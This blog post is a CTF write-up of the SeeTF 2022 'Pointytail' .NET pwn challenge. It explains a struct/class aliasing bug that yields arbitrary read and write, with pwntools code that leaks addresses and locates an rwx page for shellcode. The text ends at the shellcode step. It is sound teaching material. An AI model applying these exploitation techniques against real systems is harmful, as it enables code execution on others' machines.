<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="keywords" content="Hexo Theme Redefine">
    
    <meta name="author" content="Linz">
    <!-- preconnect -->
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>

    
    <!--- Seo Part-->
    
    <link rel="canonical" href="https://linz04.github.io/2022/06/06/2022-06-06-pointytail/"/>
    <meta name="robots" content="index,follow">
    <meta name="googlebot" content="index,follow">
    <meta name="revisit-after" content="1 days">
    
    
    
        
        <meta name="description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:type" content="article">
<meta property="og:title" content="SeeTF 2022 - Pointytail">
<meta property="og:url" content="https://linz04.github.io/2022/06/06/2022-06-06-pointytail/index.html">
<meta property="og:site_name" content="Linz&#39;s Blog">
<meta property="og:description" content="Hexo Theme Redefine, Redefine Your Hexo Journey.">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://linz04.github.io/images/redefine-og.webp">
<meta property="article:published_time" content="2022-06-06T12:47:55.000Z">
<meta property="article:modified_time" content="2025-08-05T04:09:36.824Z">
<meta property="article:author" content="Linz">
<meta property="article:tag" content="PWN">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://linz04.github.io/images/redefine-og.webp">
    
    
    <!--- Icon Part-->
    <link rel="icon" type="image/png" href="/images/linux_logo2.png" sizes="192x192">
    <link rel="apple-touch-icon" sizes="180x180" href="/images/linux_logo2.png">
    <meta name="theme-color" content="#A31F34">
    <link rel="shortcut icon" href="/images/linux_logo2.png">
    <!--- Page Info-->
    
    <title>
        
            SeeTF 2022 - Pointytail | Linz&#39;s Blog
        
    </title>

    
<link rel="stylesheet" href="/fonts/Chillax/chillax.css">


    <!--- Inject Part-->
    

    
<link rel="stylesheet" href="/css/style.css">


    
        
<link rel="stylesheet" href="/css/build/tailwind.css">

    

    
<link rel="stylesheet" href="/fonts/GeistMono/geist-mono.css">

    
<link rel="stylesheet" href="/fonts/Geist/geist.css">

    <!--- Font Part-->
    
    
    
    
    
    

    <script id="hexo-configurations">
    window.config = {"hostname":"linz04.github.io","root":"/","language":"en"};
    window.theme = {"articles":{"style":{"font_size":"16px","line_height":1.5,"image_border_radius":"14px","image_alignment":"center","image_caption":false,"link_icon":true,"delete_mask":false,"title_alignment":"left","headings_top_spacing":{"h1":"3.2rem","h2":"2.4rem","h3":"1.9rem","h4":"1.6rem","h5":"1.4rem","h6":"1.3rem"}},"word_count":{"enable":true,"count":true,"min2read":true},"author_label":{"enable":false,"auto":false,"list":[]},"code_block":{"copy":true,"style":"mac","highlight_theme":{"light":"github","dark":"vs2015"},"font":{"enable":false,"family":null,"url":null}},"toc":{"enable":true,"max_depth":3,"number":false,"expand":true,"init_open":true},"copyright":{"enable":false,"default":"cc_by_nc_sa"},"lazyload":true,"pangu_js":false,"recommendation":{"enable":false,"title":"推荐阅读","limit":3,"mobile_limit":2,"placeholder":"/images/wallhaven-wqery6-light.webp","skip_dirs":[]}},"colors":{"primary":"#A31F34","secondary":null,"default_mode":"light"},"global":{"fonts":{"chinese":{"enable":false,"family":null,"url":null},"english":{"enable":false,"family":null,"url":null},"title":{"enable":false,"family":null,"url":null}},"content_max_width":"1000px","sidebar_width":"210px","hover":{"shadow":true,"scale":false},"scroll_progress":{"bar":false,"percentage":true},"website_counter":{"url":"https://cn.vercount.one/js","enable":false,"site_pv":true,"site_uv":true,"post_pv":true},"single_page":true,"preloader":{"enable":false,"custom_message":null},"open_graph":{"enable":true,"image":"/images/redefine-og.webp","description":"Hexo Theme Redefine, Redefine Your Hexo Journey."},"google_analytics":{"enable":false,"id":null}},"home_banner":{"enable":true,"style":"fixed","image":{"light":"/images/wallhaven-wqery6-light.webp","dark":"/images/wallhaven-wqery6-dark.webp"},"title":"Linz's Blog","subtitle":{"text":[],"hitokoto":{"enable":false,"show_author":false,"api":"https://v1.hitokoto.cn"},"typing_speed":100,"backing_speed":80,"starting_delay":500,"backing_delay":1500,"loop":true,"smart_backspace":true},"text_color":{"light":"#fff","dark":"#d1d1b6"},"text_style":{"title_size":"2.8rem","subtitle_size":"1.5rem","line_height":1.2},"custom_font":{"enable":false,"family":null,"url":null},"social_links":{"enable":true,"style":"default","links":{"github":"https://github.com/linz04","instagram":null,"zhihu":null,"twitter":null,"linkedin":"https://www.linkedin.com/in/linuztri/"},"qrs":{"weixin":null}}},"plugins":{"feed":{"enable":false},"aplayer":{"enable":false,"type":"fixed","audios":[{"name":null,"artist":null,"url":null,"cover":null,"lrc":null}]},"mermaid":{"enable":false,"version":"11.4.1"}},"version":"2.8.2","navbar":{"auto_hide":false,"color":{"left":"#f78736","right":"#367df7","transparency":35},"width":{"home":"1200px","pages":"1000px"},"links":{"Home":{"path":"/","icon":"fa-regular fa-house"}},"search":{"enable":false,"preload":true}},"page_templates":{"friends_column":2,"tags_style":"blur"},"home":{"sidebar":{"enable":true,"position":"left","first_item":"menu","announcement":null,"show_on_mobile":true,"links":null},"article_date_format":"auto","excerpt_length":200,"categories":{"enable":true,"limit":3},"tags":{"enable":true,"limit":3}},"footerStart":"2022/8/17 11:45:14"};
    window.lang_ago = {"second":"%s seconds ago","minute":"%s minutes ago","hour":"%s hours ago","day":"%s days ago","week":"%s weeks ago","month":"%s months ago","year":"%s years ago"};
    window.data = {"masonry":false};
  </script>
    
    <!--- Fontawesome Part-->
    
<link rel="stylesheet" href="/fontawesome/fontawesome.min.css">

    
<link rel="stylesheet" href="/fontawesome/brands.min.css">

    
<link rel="stylesheet" href="/fontawesome/solid.min.css">

    
<link rel="stylesheet" href="/fontawesome/regular.min.css">

    
    
    
    
<meta name="generator" content="Hexo 7.3.0"></head>



<body>
	<div class="progress-bar-container">
	

	
	<span class="pjax-progress-bar"></span>
	<!--        <span class="swup-progress-icon">-->
	<!--            <i class="fa-solid fa-circle-notch fa-spin"></i>-->
	<!--        </span>-->
	
</div>

<main class="page-container" id="swup">

	

	<div class="main-content-container flex flex-col justify-between min-h-dvh">
		<div class="main-content-header">
			<header class="navbar-container px-6 md:px-12">
    <div class="navbar-content transition-navbar ">
        <div class="left">
            
            <a class="logo-title" href="/">
                
                Linz&#39;s Blog
                
            </a>
        </div>

        <div class="right">
            <!-- PC -->
            <div class="desktop">
                <ul class="navbar-list">
                    
                        
                            

                            <li class="navbar-item">
                                <!-- Menu -->
                                <a class=""
                                   href="/"
                                        >
                                    <i class="fa-regular fa-house fa-fw"></i>
                                    HOME
                                    
                                </a>

                                <!-- Submenu -->
                                
                            </li>
                    
                    
                </ul>
            </div>
            <!-- Mobile -->
            <div class="mobile">
                
                <div class="icon-item navbar-bar">
                    <div class="navbar-bar-middle"></div>
                </div>
            </div>
        </div>
    </div>

    <!-- Mobile sheet -->
    <div class="navbar-drawer h-dvh w-full absolute top-0 left-0 bg-background-color flex flex-col justify-between">
        <ul class="drawer-navbar-list flex flex-col px-4 justify-center items-start">
            
                
                    

                    <li class="drawer-navbar-item text-base my-1.5 flex flex-col w-full">
                        
                        <a class="py-1.5 px-2 flex flex-row items-center justify-between gap-1 hover:!text-primary active:!text-primary text-2xl font-semibold group border-b border-border-color hover:border-primary w-full "
                           href="/"
                        >
                            <span>
                                HOME
                            </span>
                            
                                <i class="fa-regular fa-house fa-sm fa-fw"></i>
                            
                        </a>
                        

                        
                    </li>
            

            
            
        </ul>

        <div class="statistics flex justify-around my-2.5">
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/tags">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">3</div>
        <div class="label text-third-text-color text-sm">Tags</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/categories">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">1</div>
        <div class="label text-third-text-color text-sm">Categories</div>
    </a>
    <a class="item tag-count-item flex flex-col justify-center items-center w-20" href="/archives">
        <div class="number text-2xl sm:text-xl text-second-text-color font-semibold">6</div>
        <div class="label text-third-text-color text-sm">Posts</div>
    </a>
</div>
    </div>

    <div class="window-mask"></div>

</header>


		</div>

		<div class="main-content-body transition-fade-up">
			

			<div class="main-content">
				<div class="post-page-container flex relative justify-between box-border w-full h-full">
	<div class="article-content-container">

		<div class="article-title relative w-full">
			
			<div class="w-full flex items-center pt-6 justify-start">
				<h1 class="article-title-regular text-second-text-color tracking-tight text-4xl md:text-6xl font-semibold px-2 sm:px-6 md:px-8 py-3">SeeTF 2022 - Pointytail</h1>
			</div>
			
		</div>

		
		<div class="article-header flex flex-row gap-2 items-center px-2 sm:px-6 md:px-8">
			<div class="avatar w-[46px] h-[46px] flex-shrink-0 rounded-medium border border-border-color p-[1px]">
				<img src="/images/linux_logo2.png">
			</div>
			<div class="info flex flex-col justify-between">
				<div class="author flex items-center">
					<span class="name text-default-text-color text-lg font-semibold">Linz</span>
					
				</div>
				<div class="meta-info">
					<div class="article-meta-info">
    <span class="article-date article-meta-item">
        <i class="fa-regular fa-pen-fancy"></i>&nbsp;
        <span class="desktop">2022-06-06 20:47:55</span>
        <span class="mobile">2022-06-06 20:47:55</span>
        <span class="hover-info">Created</span>
    </span>
    
        <span class="article-date article-meta-item">
            <i class="fa-regular fa-wrench"></i>&nbsp;
            <span class="desktop">2025-08-05 12:09:36</span>
            <span class="mobile">2025-08-05 12:09:36</span>
            <span class="hover-info">Updated</span>
        </span>
    

    
        <span class="article-categories article-meta-item">
            <i class="fa-regular fa-folders"></i>&nbsp;
            <ul>
                
                
                    
                        
                        <li>
                            <a href="/categories/CTF-Writeups/">CTF Writeups</a>&nbsp;
                        </li>
                    
                    
                
            </ul>
        </span>
    
    
        <span class="article-tags article-meta-item">
            <i class="fa-regular fa-tags"></i>&nbsp;
            <ul>
                
                    <li>
                        <a href="/tags/PWN/">PWN</a>&nbsp;
                    </li>
                
            </ul>
        </span>
    

    
    
    
    
</div>

				</div>
			</div>
		</div>
		

		


		<div class="article-content markdown-body px-2 sm:px-6 md:px-8 pb-8">
			<h2 id="Pointy-Tail"><a href="#Pointy-Tail" class="headerlink" title="Pointy Tail"></a>Pointy Tail</h2><p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail.png"
                      alt="pointytail"
                ></p>
<h3 id="Description"><a href="#Description" class="headerlink" title="Description"></a>Description</h3><p>You can download the challenge <a class="link"   target="_blank" rel="noopener" href="https://github.com/linz04/PWN-Writeup/tree/international/SEECTF/Pointytail" >here<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a> </p>
<blockquote>
<p>Author: Neobeo<br>Types in .NET are so confusing: should a Point type be a struct or a class? Let’s have one of each, just to compare.<br>nc fun.chall.seetf.sg 50007<br>MD5: 211020d68a6243fa5572b360b27eb8d</p>
</blockquote>
<h3 id="Introduction"><a href="#Introduction" class="headerlink" title="Introduction"></a>Introduction</h3><p>In this challenge we are given 6 files including the Dockerfile.<br>The challenge file is in <em>pointytail.dll</em>. First step here we analyze what file is it just type command</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">$ file pointytail.dll</span><br><span class="line"><span class="comment"># pointytail.dll: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows</span></span><br></pre></td></tr></table></figure></div>

<p>The file is compiled by .NET framework, well I never have experience on exploiting .NET before xd, so let’s give a shot.<br>Okay, next look at the Dockerfile is it the server running on windows or on linux.</p>
<div class="code-container" data-rel="Docker"><figure class="iseeu highlight docker"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">FROM</span> mcr.microsoft.com/dotnet/runtime:<span class="number">6.0</span>-focal-amd64</span><br><span class="line"><span class="keyword">WORKDIR</span><span class="language-bash"> /app</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> useradd -m chall</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> apt update</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> apt install -y socat</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> flag.txt .</span></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> pointytail.dll .</span></span><br><span class="line"><span class="keyword">COPY</span><span class="language-bash"> pointytail.runtimeconfig.json .</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">chmod</span> +r flag.txt</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">chmod</span> +r pointytail.dll</span></span><br><span class="line"><span class="keyword">RUN</span><span class="language-bash"> <span class="built_in">chmod</span> +r pointytail.runtimeconfig.json</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">USER</span> chall</span><br><span class="line"></span><br><span class="line"><span class="keyword">ENTRYPOINT</span><span class="language-bash"> socat tcp-l:1336,fork,reuseaddr <span class="built_in">exec</span>:<span class="string">&quot;dotnet pointytail.dll&quot;</span></span></span><br></pre></td></tr></table></figure></div>

<p>The docker pull from mcr.microsoft, at first I thought that’s the windows image. But the docker using apt so it’s a linux image.<br>The file running by dotnet, so we need to install dotnet first on our machine. For the installation guide you can see one of tutorial <a class="link"   target="_blank" rel="noopener" href="https://docs.microsoft.com/en-us/dotnet/core/install/linux-ubuntu" >Here<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a>.<br>Next, after finished install dotnet just simply run command like this to execute the challenge.</p>
<div class="code-container" data-rel="Plaintext"><figure class="iseeu highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">$ dotnet pointytail.dll</span><br></pre></td></tr></table></figure></div>


<h3 id="The-Bug"><a href="#The-Bug" class="headerlink" title="The Bug"></a>The Bug</h3><p>For finding the bug, we need to decompile the dll files, to do that we can use decompiler tools <a class="link"   target="_blank" rel="noopener" href="https://github.com/icsharpcode/ILSpy" >ILSpy<i class="fa-solid fa-arrow-up-right ml-[0.2em] font-light align-text-top text-[0.7em] link-icon"></i></a>.<br>Just download the release file and run the ILSpy.</p>
<div class="code-container" data-rel="C#"><figure class="iseeu highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">Main</span>()</span></span><br><span class="line">&#123;</span><br><span class="line">	PointStruct pointStruct = <span class="literal">default</span>(PointStruct);</span><br><span class="line">	pointStruct.x = rnd.NextDouble();</span><br><span class="line">	pointStruct.y = rnd.NextDouble();</span><br><span class="line">	PointStruct s = pointStruct;</span><br><span class="line">	Main2(<span class="keyword">ref</span> s);</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure></div>

<p>The <strong>Main()</strong> function declare the <em>PointStruct</em> and fill it with double value, and then call <strong>Main2(ref s)</strong> function.<br>The <strong>PointStruct</strong> it’s look like this.</p>
<div class="code-container" data-rel="C#"><figure class="iseeu highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">struct</span> PointStruct</span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="built_in">double</span> x;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="built_in">double</span> y;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>Alright, not so complex struct let’s move to <em>Main2()</em></p>
<div class="code-container" data-rel="C#"><figure class="iseeu highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">Main2</span>(<span class="params"><span class="keyword">ref</span> PointStruct s</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">	PointClass c = <span class="keyword">new</span> PointClass</span><br><span class="line">	&#123;</span><br><span class="line">		x = rnd.NextDouble(),</span><br><span class="line">		y = rnd.NextDouble()</span><br><span class="line">	&#125;;</span><br><span class="line">	Main3(<span class="keyword">ref</span> s, <span class="keyword">ref</span> c);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>
<p>This function declare <strong>PointClass</strong> and fill with double value again, the Class it’s look like this:</p>
<div class="code-container" data-rel="C#"><figure class="iseeu highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">class</span> <span class="title">PointClass</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">public</span> <span class="built_in">double</span> x;</span><br><span class="line"></span><br><span class="line">	<span class="keyword">public</span> <span class="built_in">double</span> y;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>Next <strong>Main3()</strong> function:</p>
<div class="code-container" data-rel="C#"><figure class="iseeu highlight c#"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">private</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">Main3</span>(<span class="params"><span class="keyword">ref</span> PointStruct s, <span class="keyword">ref</span> PointClass c</span>)</span></span><br><span class="line">&#123;</span><br><span class="line">	Console.WriteLine(<span class="string">&quot;Which is better, a struct or a class? Why not both!&quot;</span>);</span><br><span class="line">	<span class="keyword">while</span> (<span class="literal">true</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="built_in">string</span>[] array = Console.ReadLine().Split(<span class="string">&#x27; &#x27;</span>, (StringSplitOptions)<span class="number">0</span>);</span><br><span class="line">		<span class="built_in">string</span> text = array[<span class="number">0</span>];</span><br><span class="line">		<span class="keyword">if</span> (!(text == <span class="string">&quot;s&quot;</span>))</span><br><span class="line">		&#123;</span><br><span class="line">			<span class="keyword">if</span> (text == <span class="string">&quot;c&quot;</span>)</span><br><span class="line">			&#123;</span><br><span class="line">				c.x = <span class="built_in">double</span>.Parse(array[<span class="number">1</span>]);</span><br><span class="line">				c.y = <span class="built_in">double</span>.Parse(array[<span class="number">2</span>]);</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">else</span></span><br><span class="line">			&#123;</span><br><span class="line">				Console.WriteLine(<span class="string">&quot;s = (&#123;0&#125;, &#123;1&#125;)&quot;</span>, (<span class="built_in">object</span>)s.x, (<span class="built_in">object</span>)s.y);</span><br><span class="line">				Console.WriteLine(<span class="string">&quot;c = (&#123;0&#125;, &#123;1&#125;)&quot;</span>, (<span class="built_in">object</span>)c.x, (<span class="built_in">object</span>)c.y);</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span></span><br><span class="line">		&#123;</span><br><span class="line">			s.x = <span class="built_in">double</span>.Parse(array[<span class="number">1</span>]);</span><br><span class="line">			s.y = <span class="built_in">double</span>.Parse(array[<span class="number">2</span>]);</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></div>

<p>The challenge will be start from this function, honestly i dont understand too much about C#. But this code not too complicated, the program will ask our input, if our input start with <strong>s</strong> followed by the double value, then it will fill the object of <strong>s</strong>, this same with object of <strong>c</strong>. And if our input not started with <strong>s</strong> or <strong>c</strong>, it will print the result.</p>
<div class="code-container" data-rel="Bash"><figure class="iseeu highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line">$ dotnet pointytail.dll</span><br><span class="line">$ Which is better, a struct or a class? Why not both!</span><br><span class="line">$ 1</span><br><span class="line">$ s = (6.93762983151493E-310, 6.95307569920877E-310)</span><br><span class="line">$ c = (0.9251204335393668, 0.26444549835642683)</span><br><span class="line">$ c 0 0</span><br><span class="line">$ 1</span><br><span class="line">$ s = (6.93762983151493E-310, 6.95307569920877E-310)</span><br><span class="line">$ c = (0, 0)</span><br><span class="line"></span><br><span class="line">````</span><br><span class="line">Well, honestly i dont have idea <span class="built_in">where</span> the bug is from just <span class="built_in">read</span> the code. But after try some random input, I found an interesting error <span class="keyword">while</span> debugging at gdb.\</span><br><span class="line">For debugging I use script like this.</span><br><span class="line">```py</span><br><span class="line">from pwn import *</span><br><span class="line">from sys import *</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">HOST = <span class="string">&quot;fun.chall.seetf.sg&quot;</span></span><br><span class="line">PORT = 50007</span><br><span class="line">p = process([<span class="string">&quot;dotnet&quot;</span>, <span class="string">&quot;pointytail.dll&quot;</span>])</span><br><span class="line"><span class="built_in">print</span>(util.proc.pidof(p))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>
<p>Then just attach the pidof at gdb. When we Input <code>s 0 0</code> the error show Object reference is not set.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail1.png"
                      alt="pointytail"
                ><br>Next here I try to convert the first value of <strong>s</strong> from decimal to hex to see what is that.</p>
<div class="code-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">do2hex</span>(<span class="params">f</span>):</span><br><span class="line">	<span class="keyword">return</span> (struct.unpack(<span class="string">&#x27;&lt;Q&#x27;</span>, struct.pack(<span class="string">&#x27;&lt;d&#x27;</span>, f))[<span class="number">0</span>])</span><br><span class="line"></span><br><span class="line">p.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;s = &#x27;</span>)</span><br><span class="line"></span><br><span class="line">res = (p.recvline()[<span class="number">1</span>:-<span class="number">2</span>]).split(<span class="string">b&#x27;, &#x27;</span>)</span><br><span class="line">s1 = do2hex(<span class="built_in">float</span>(res[<span class="number">0</span>]))</span><br><span class="line">s2 = do2hex(<span class="built_in">float</span>(res[<span class="number">1</span>]))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(s1), <span class="built_in">hex</span>(s2))</span><br><span class="line">p.interactive()</span><br></pre></td></tr></table></figure></div>
<p><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail2.png"
                      alt="pointytail"
                ></p>
<p>We got Leak an address, because of this leak now I understand a bit about the code, from what I got, in <strong>Main3()</strong> var s represent as <strong>**s</strong>, you can see again in <strong>Main()</strong> function, <code>PointStruct s = pointStruct;</code> and the pointStruct is <code>PointStruct pointStruct = default(PointStruct);</code>. So in <strong>Main3()</strong> function when the program print <code>(object)s.x</code> instead print the value of <strong>pointStruct.x</strong> it will print the address <strong>pointStruct</strong> itself. So that var <strong>s</strong> will be pointing to var <strong>c</strong>.\</p>
<p>Oke let me simply this.<br>var <strong>s</strong> its a pointer contains value of var <strong>c</strong>. So with this we found the bug where we can arbitary write and read.<br>To validate that let’s see at gdb.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail3.png"
                      alt="pointytail"
                ><br>As you can see from picture above we can do arbitary write and read with first index of var <strong>s</strong>, just change it to address where we want to write or read because it’s pointing to var <strong>c</strong>.\</p>
<h3 id="Gain-Shell"><a href="#Gain-Shell" class="headerlink" title="Gain Shell"></a>Gain Shell</h3><p>We can do arbwrite and arbread and we got leak stack and the mapped area. How to get shell?<br>If you check vmmap, there’s many rwxp address there from because of <strong>dotnet</strong>, we can use one of that address to write shellcode.<br>Because we have stack address, we can leak one of rwxp address from stack. Luckily we have one near the address leak we have.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail5.png"
                      alt="pointytail"
                ><br><br><br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail6.png"
                      alt="pointytail"
                ><br>The offset to the rwxp will be same, With this now we have the rwxp address.</p>
<div class="code-container" data-rel="Py"><figure class="iseeu highlight py"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">def</span> <span class="title function_">do2hex</span>(<span class="params">f</span>):</span><br><span class="line">	<span class="keyword">return</span> (struct.unpack(<span class="string">&#x27;&lt;Q&#x27;</span>, struct.pack(<span class="string">&#x27;&lt;d&#x27;</span>, f))[<span class="number">0</span>])</span><br><span class="line"></span><br><span class="line"><span class="keyword">def</span> <span class="title function_">hex2do</span>(<span class="params">f</span>):</span><br><span class="line">	<span class="keyword">return</span> struct.unpack(<span class="string">&#x27;&lt;d&#x27;</span>, f)[<span class="number">0</span>]</span><br><span class="line">p.sendline(<span class="string">b&#x27;a&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;s = &#x27;</span>)</span><br><span class="line"></span><br><span class="line">res = (p.recvline()[<span class="number">1</span>:-<span class="number">2</span>]).split(<span class="string">b&#x27;, &#x27;</span>)</span><br><span class="line">leak = do2hex(<span class="built_in">float</span>(res[<span class="number">0</span>]))</span><br><span class="line">stack = do2hex(<span class="built_in">float</span>(res[<span class="number">1</span>]))</span><br><span class="line"><span class="built_in">print</span>(<span class="built_in">hex</span>(leak), <span class="built_in">hex</span>(stack))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">arg1 = hex2do(p64(leak-<span class="number">8</span>))</span><br><span class="line">arg2 = hex2do(p64(stack))</span><br><span class="line">p.sendline(<span class="string">f&quot;s <span class="subst">&#123;arg1&#125;</span> <span class="subst">&#123;arg2&#125;</span>&quot;</span>)</span><br><span class="line">p.sendline(<span class="string">b&#x27;1&#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;c = &#x27;</span>)</span><br><span class="line">p.recvuntil(<span class="string">b&#x27;c = &#x27;</span>)</span><br><span class="line">res = p.recvline()[<span class="number">1</span>:-<span class="number">2</span>].split(<span class="string">b&#x27;, &#x27;</span>)</span><br><span class="line">rwxp = do2hex(<span class="built_in">float</span>(res[<span class="number">0</span>]))-<span class="number">0xe9340</span></span><br><span class="line"><span class="built_in">print</span>(<span class="string">&quot;rwxp: &quot;</span>, <span class="built_in">hex</span>(rwxp))</span><br></pre></td></tr></table></figure></div>
<p>Next, because the program run on while(1) loop, we need to find address when it jump back.<br><img  
                     lazyload
                     src="/images/loading.svg"
                     data-src="/images/pointytail/pointytail7.png"
                      alt="pointytail"
                ><br>Now with this we just need to put our shellcode to rwxp, and the overwrite the jump address to our shellcode.<br>Because we can just write 8 bytes, so we need to divide our shellcode.</p>
